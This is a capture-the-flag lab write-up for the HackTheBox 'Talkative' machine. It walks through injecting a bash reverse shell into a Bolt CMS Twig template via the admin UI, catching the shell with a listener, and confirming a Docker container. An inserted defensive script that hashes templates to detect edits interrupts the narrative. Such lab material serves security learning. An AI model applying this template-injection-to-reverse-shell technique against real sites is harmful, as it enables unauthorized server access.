RCE via SSTI
Although the version information suggests the target Bolt CMS instance is not vulnerable by itself, RCE can still be achieved via SSTI; this article goes through it step by step.
Heading over to Main Configuration
I need to check the template (theme) used here:
base-2021
Now heading over to View & edit templates
Then I select the corresponding template directory:
base-2021
There is the index.twig file, which is the actual template file for the Twig (PHP) engine.
This is the file I want to inject code into.
I then inject a simple bash reverse shell into it and save the changes.
The popup notification confirms the save.
All that is left is to clear the cache so that the changes take effect.
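Since the whole attack path here is an edit to a theme template through the admin UI, the defensive check a practitioner would want is a file-integrity baseline over the theme's .twig files. The script below is an added example, not part of the original write-up or of Bolt CMS; the theme path, file contents and the hypothetical "edited via admin UI" change are constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up: a small file-integrity
# check for a Bolt theme directory. It records SHA-256 hashes of every
# .twig template and later reports any template that was edited, added
# or removed, which is what an edit through "View & edit templates" does.
# The theme path and file contents below are constructed for the demo.

# Record a baseline: $1 = theme directory, $2 = output file of hashes.
theme_baseline() {
  ( cd "$1" && find . -type f -name '*.twig' -exec sha256sum {} + | sort -k2 ) > "$2"
}

# Compare the current state against a baseline: $1 = theme directory,
# $2 = baseline file. Prints the differing hash lines and returns 1 when
# any template changed, was added or was removed; returns 0 otherwise.
theme_verify() {
  local current status
  current=$(mktemp)
  theme_baseline "$1" "$current"
  if diff "$2" "$current" >/dev/null; then
    status=0
  else
    echo "template integrity check FAILED for $1:"
    diff "$2" "$current"
    status=1
  fi
  rm -f "$current"
  return "$status"
}

# Demo: build a constructed theme, baseline it, then append to index.twig
# the way an attacker would through the CMS UI. Returns 0 if the change
# is detected, 1 if it went unnoticed.
demo() {
  local root
  root=$(mktemp -d)
  mkdir -p "$root/base-2021"
  printf '<html>{{ record.title }}</html>\n' > "$root/base-2021/index.twig"
  theme_baseline "$root/base-2021" "$root/theme.sha256"
  theme_verify "$root/base-2021" "$root/theme.sha256" || { rm -rf "$root"; return 1; }
  # Simulated edit via the admin UI (constructed, harmless content).
  printf '{# edited via admin UI #}\n' >> "$root/base-2021/index.twig"
  if theme_verify "$root/base-2021" "$root/theme.sha256"; then
    rm -rf "$root"; return 1
  fi
  rm -rf "$root"
  return 0
}
```

Run theme_baseline once after a legitimate deploy and theme_verify periodically (for example from cron); any non-zero exit is a template change nobody deployed.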
┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ curl -s http://talkative.htb/
Upon accessing the website as a regular user, the malicious template is rendered, resulting in a reverse shell to Kali.
┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.155] 59044
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@2f9b5795d152:/var/www/talkative.htb/bolt/public$ whoami
whoami
www-data
www-data@2f9b5795d152:/var/www/talkative.htb/bolt/public$ hostname
hostname
2f9b5795d152
www-data@2f9b5795d152:/var/www/talkative.htb/bolt/public$ ifconfig
ifconfig
bash: ifconfig: command not found
www-data@2f9b5795d152:/var/www/talkative.htb/bolt/public$ ip a
ip a
bash: ip: command not found
As expected, a shell session is opened. Interestingly, I am once again unable to execute network-related commands; I might be inside another Docker container.
www-data@2f9b5795d152:/var/www/talkative.htb/bolt/public$ ls -la /
total 80
drwxr-xr-x 1 root root 4096 jun 8 11:24 .
drwxr-xr-x 1 root root 4096 jun 8 11:24 ..
-rwxr-xr-x 1 root root 0 jun 8 11:24 .dockerenv
drwxr-xr-x 1 root root 4096 Mar 6 2022 bin
drwxr-xr-x 2 root root 4096 Dec 11 2021 boot
drwxr-xr-x 5 root root 340 jun 8 11:24 dev
drwxr-xr-x 1 root root 4096 jun 8 11:24 etc
drwxr-xr-x 2 root root 4096 Dec 11 2021 home
drwxr-xr-x 1 root root 4096 Mar 1 2022 lib
drwxr-xr-x 2 root root 4096 Feb 28 2022 lib64
drwxr-xr-x 2 root root 4096 Feb 28 2022 media
drwxr-xr-x 2 root root 4096 Feb 28 2022 mnt
drwxr-xr-x 2 root root 4096 Feb 28 2022 opt
dr-xr-xr-x 417 root root 0 jun 8 11:24 proc
drwx------ 1 root root 4096 Mar 6 2022 root
drwxr-xr-x 1 root root 4096 Mar 1 2022 run
drwxr-xr-x 1 root root 4096 Mar 1 2022 sbin
drwxr-xr-x 2 root root 4096 Feb 28 2022 srv
dr-xr-xr-x 13 root root 0 jun 8 11:24 sys
drwxrwxrwt 1 root root 4096 jun 8 14:59 tmp
drwxr-xr-x 1 root root 4096 Feb 28 2022 usr
drwxr-xr-x 1 root root 4096 Mar 1 2022 var
The .dockerenv file present in the system root directory confirms it.
I would need to enumerate the current environment in order to break out of it.